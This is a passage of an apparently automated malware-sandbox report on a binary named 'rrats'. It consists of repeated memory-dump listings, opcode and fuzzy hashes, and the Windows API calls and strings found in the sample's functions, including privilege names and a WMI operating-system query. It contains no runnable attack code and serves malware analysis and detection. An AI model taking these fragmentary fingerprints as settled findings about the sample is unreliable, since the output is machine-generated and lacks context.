                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 081f475b9aef60b3334e3aeada960cdc378e45b6a815b57280eca043e5493d33
                                                              • Instruction ID: 5d76d0fe737ac2e722cfa6e7acec0c5ecf40d9c598e43879579272764611d705
                                                              • Opcode Fuzzy Hash: 081f475b9aef60b3334e3aeada960cdc378e45b6a815b57280eca043e5493d33
                                                              • Instruction Fuzzy Hash: A5619871A00F4957DB389A68DC95FBE23D8EB11350F18061EE893DF291D691FFC2A215
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                              • Instruction ID: f3c214f002198114e4574b749f802be5fdaefcbfdb18085366e5774f5a753a5d
                                                              • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                              • Instruction Fuzzy Hash: 13514961600F445BDF388668C56AFBF27C59B01300F58491DE893DB682C615FFC69396
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 43c46a0957200aeb69e41f60fd7c8a31d56220687d6ce1ebf195216b44dfb25f
                                                              • Instruction ID: 979ae0176922a3a0fbf76a57c09d679de873720355528d155b855830786253d7
                                                              • Opcode Fuzzy Hash: 43c46a0957200aeb69e41f60fd7c8a31d56220687d6ce1ebf195216b44dfb25f
                                                              • Instruction Fuzzy Hash: 7F51D3315083D68ED702DF64C58046EBFE0AE9B318F4909AEE5D95B243C231DB4BDB62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e9de910e3b44b1c5a64980c0c03f89b4e0cecee9c5ab5de1f5de5bec3ba685c6
                                                              • Instruction ID: 1ef9d006d2032baaf4b1da4aec83fcc722453a9d99c2ca89b1904c295287e681
                                                              • Opcode Fuzzy Hash: e9de910e3b44b1c5a64980c0c03f89b4e0cecee9c5ab5de1f5de5bec3ba685c6
                                                              • Instruction Fuzzy Hash: 3551EFB1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3340D734EA59CB9A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                              • Instruction ID: e43b8090604f03a959ddee17f74a740431649f29fdd031342c8fe1f8799347d7
                                                              • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                              • Instruction Fuzzy Hash: D631F8B1A147878FCB18DF68C8511AEBBE0FB95304F10452DE495C7342C739EA0ACB91
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00CAE30E
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                • Part of subcall function 00CB1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00CE1030,?,00CAD928,00000000,?,00000050,00CE1030), ref: 00CB1DC4
                                                              • _strlen.LIBCMT ref: 00CAE32F
                                                              • SetDlgItemTextW.USER32(?,00CDE274,?), ref: 00CAE38F
                                                              • GetWindowRect.USER32(?,?), ref: 00CAE3C9
                                                              • GetClientRect.USER32(?,?), ref: 00CAE3D5
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00CAE475
                                                              • GetWindowRect.USER32(?,?), ref: 00CAE4A2
                                                              • SetWindowTextW.USER32(?,?), ref: 00CAE4DB
                                                              • GetSystemMetrics.USER32(00000008), ref: 00CAE4E3
                                                              • GetWindow.USER32(?,00000005), ref: 00CAE4EE
                                                              • GetWindowRect.USER32(00000000,?), ref: 00CAE51B
                                                              • GetWindow.USER32(00000000,00000002), ref: 00CAE58D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                              • String ID: $%s:$CAPTION$d
                                                              • API String ID: 2407758923-2512411981
                                                              • Opcode ID: c168814d20279b3dcdb63a0c1ae460502c9be8c043619de72249c79ebd45a487
                                                              • Instruction ID: b89b47cfe023fbc73f0a41d79cc8010ec880ec05f004e5763ad9487374541c28
                                                              • Opcode Fuzzy Hash: c168814d20279b3dcdb63a0c1ae460502c9be8c043619de72249c79ebd45a487
                                                              • Instruction Fuzzy Hash: 6481B171608301AFD710DFA8CC89B6FBBEDEB89708F04091DFA99D7250D630E9058B62
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 00CCCB66
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC71E
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC730
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC742
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC754
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC766
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC778
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC78A
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC79C
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7AE
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7C0
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7D2
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7E4
                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7F6
                                                              • _free.LIBCMT ref: 00CCCB5B
                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                              • _free.LIBCMT ref: 00CCCB7D
                                                              • _free.LIBCMT ref: 00CCCB92
                                                              • _free.LIBCMT ref: 00CCCB9D
                                                              • _free.LIBCMT ref: 00CCCBBF
                                                              • _free.LIBCMT ref: 00CCCBD2
                                                              • _free.LIBCMT ref: 00CCCBE0
                                                              • _free.LIBCMT ref: 00CCCBEB
                                                              • _free.LIBCMT ref: 00CCCC23
                                                              • _free.LIBCMT ref: 00CCCC2A
                                                              • _free.LIBCMT ref: 00CCCC47
                                                              • _free.LIBCMT ref: 00CCCC5F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: beaba5b339a57080864fca00f973c601def26575867b387696890440471f797e
                                                              • Instruction ID: 48e647183da0de5e250c5088b080d114106660cd6457ff1e8b131a0b4b604379
                                                              • Opcode Fuzzy Hash: beaba5b339a57080864fca00f973c601def26575867b387696890440471f797e
                                                              • Instruction Fuzzy Hash: BE314B31A002069FEB20AA78E886F5BB7E9EF10310F15442DE16ED7192DF35EE84DB10
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00CB9736
                                                              • _wcslen.LIBCMT ref: 00CB97D6
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00CB97E5
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00CB9806
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00CB982D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                              • API String ID: 1777411235-4209811716
                                                              • Opcode ID: 581a18427628f643021847f0e58150160a26f18ef927691a3d20df1ba1b59704
                                                              • Instruction ID: a28f578e5675c39ceb7d5488974b5645ba3ff03902a1f3438fa2dcc44a03846c
                                                              • Opcode Fuzzy Hash: 581a18427628f643021847f0e58150160a26f18ef927691a3d20df1ba1b59704
                                                              • Instruction Fuzzy Hash: DB3116325083517BE725AB34EC46FAF77A8EF42710F14011EF611A61D2EB75DA0983A6
                                                              APIs
                                                              • GetWindow.USER32(?,00000005), ref: 00CBD6C1
                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 00CBD6ED
                                                                • Part of subcall function 00CB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CAC116,00000000,.exe,?,?,00000800,?,?,?,00CB8E3C), ref: 00CB1FD1
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00CBD709
                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CBD720
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00CBD734
                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CBD75D
                                                              • DeleteObject.GDI32(00000000), ref: 00CBD764
                                                              • GetWindow.USER32(00000000,00000002), ref: 00CBD76D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                              • String ID: STATIC
                                                              • API String ID: 3820355801-1882779555
                                                              • Opcode ID: 2e496fc1e30a7fb3e43f515eed9a260cc8f5f15671c944df68c75dfa57177e77
                                                              • Instruction ID: 606b8b88733225238a6820774c6864955b409cfde792a0abe606fb0f06b862c2
                                                              • Instruction Fuzzy Hash: 8C1133721017107BE220ABB19C4AFEF7A5CAF04741F004121FA66F2295EA65CF4596B6
                                                              APIs
                                                              • _free.LIBCMT ref: 00CC9705
                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                              • _free.LIBCMT ref: 00CC9711
                                                              • _free.LIBCMT ref: 00CC971C
                                                              • _free.LIBCMT ref: 00CC9727
                                                              • _free.LIBCMT ref: 00CC9732
                                                              • _free.LIBCMT ref: 00CC973D
                                                              • _free.LIBCMT ref: 00CC9748
                                                              • _free.LIBCMT ref: 00CC9753
                                                              • _free.LIBCMT ref: 00CC975E
                                                              • _free.LIBCMT ref: 00CC976C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 7802ade1b8a58d3a804f47cd11dd8dc2f426162915d319f4875dd491838f2a73
                                                              • Instruction ID: b537e8ecdc8c0aeea7b4c7c3ad2c72125d209ac10bc9047156b95683e9549fa1
                                                              • Instruction Fuzzy Hash: 1311E97550000ABFCB01EF58D842EDE3B75EF14350B0255A9FA094F262DE31DE54AB84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 322700389-393685449
                                                              • Opcode ID: b269b07b0b9f83ff0f23c6774274d2bb477364fc56ba8fdaf906b8dede01b7b8
                                                              • Instruction ID: f3fc51cf77106af9f54d67e1f8d4b6f5e7511b38bd408f6cedea0374400605cc
                                                              • Instruction Fuzzy Hash: 02B14771900259EFCF25DFA4D881EAEBBB5BF04310B18815EE8216B212D735DB52DB91
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA6FAA
                                                              • _wcslen.LIBCMT ref: 00CA7013
                                                              • _wcslen.LIBCMT ref: 00CA7084
                                                                • Part of subcall function 00CA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CA7AAB
                                                                • Part of subcall function 00CA7A9C: GetLastError.KERNEL32 ref: 00CA7AF1
                                                                • Part of subcall function 00CA7A9C: CloseHandle.KERNEL32(?), ref: 00CA7B00
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 3122303884-3508440684
                                                              • Opcode ID: 7242cf99ceca9c2b593a9d1c25cae2fd6c5eb94ac79dac341b31d98a22327173
                                                              • Instruction ID: 54c78cfd6adf09313937312dc59917ec6db82e466a07aa1b5c896e45091636a5
                                                              • Instruction Fuzzy Hash: F1411BB1D08386BAEF20E7709D86FEE77ACAF06308F040555FA55A6182D774AB44D721
                                                              APIs
                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                              • EndDialog.USER32(?,00000001), ref: 00CBB610
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CBB637
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00CBB650
                                                              • SetWindowTextW.USER32(?,?), ref: 00CBB661
                                                              • GetDlgItem.USER32(?,00000065), ref: 00CBB66A
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CBB67E
                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CBB694
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                              • String ID: LICENSEDLG
                                                              • API String ID: 3214253823-2177901306
                                                              • Opcode ID: 1d5c147ee4dfd855f8a6ddb5a61bee9c493a7e989d320b4be79c8ec9e8adc706
                                                              • Instruction ID: 9f42a3025d8853399240b4c507746578bc9c7fe36b2c9f82718b8789d78dd005
                                                              • Instruction Fuzzy Hash: C721C732204319BBD6255F66ED4AFBF3B7DEB4AB41F010018F609D65E0CBA29E01D636
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,86DBCCB0,00000001,00000000,00000000,?,?,00CAAF6C,ROOT\CIMV2), ref: 00CBFD99
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00CAAF6C,ROOT\CIMV2), ref: 00CBFE14
                                                              • SysAllocString.OLEAUT32(00000000), ref: 00CBFE1F
                                                              • _com_issue_error.COMSUPP ref: 00CBFE48
                                                              • _com_issue_error.COMSUPP ref: 00CBFE52
                                                              • GetLastError.KERNEL32(80070057,86DBCCB0,00000001,00000000,00000000,?,?,00CAAF6C,ROOT\CIMV2), ref: 00CBFE57
                                                              • _com_issue_error.COMSUPP ref: 00CBFE6A
                                                              • GetLastError.KERNEL32(00000000,?,?,00CAAF6C,ROOT\CIMV2), ref: 00CBFE80
                                                              • _com_issue_error.COMSUPP ref: 00CBFE93
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                              • String ID:
                                                              • API String ID: 1353541977-0
                                                              • Opcode ID: 1293d1e5e11e82fa61b589dee1a789d6c5c5ef5c41c5c591f846aca4866e1028
                                                              • Instruction ID: 248ffa0f0dc1f2b8868cd22553d3eea75672cdadac8801c323067c937d2605c6
                                                              • Instruction Fuzzy Hash: 804108B1A00259ABDB109F68DC45BEEBBA8EB48710F10823EF915E7351D735DA01C7A5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                              • API String ID: 3519838083-3505469590
                                                              • Opcode ID: 420c7de5e381ab3e9116158ed241fb9b0154bc9dfca74a5e13bd8838b124cf97
                                                              • Instruction ID: df8f749fbd8e0102be24f105cd5b739c2f64c2696e1fce1b5be3d2ebaa5d8d32
                                                              • Instruction Fuzzy Hash: A47170B0A0021AAFDF14DFA4CC95AAFB7B9FF49314B14015EE512A72A1CB306E41DB61
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA9387
                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00CA93AA
                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00CA93C9
                                                                • Part of subcall function 00CAC29A: _wcslen.LIBCMT ref: 00CAC2A2
                                                                • Part of subcall function 00CB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CAC116,00000000,.exe,?,?,00000800,?,?,?,00CB8E3C), ref: 00CB1FD1
                                                              • _swprintf.LIBCMT ref: 00CA9465
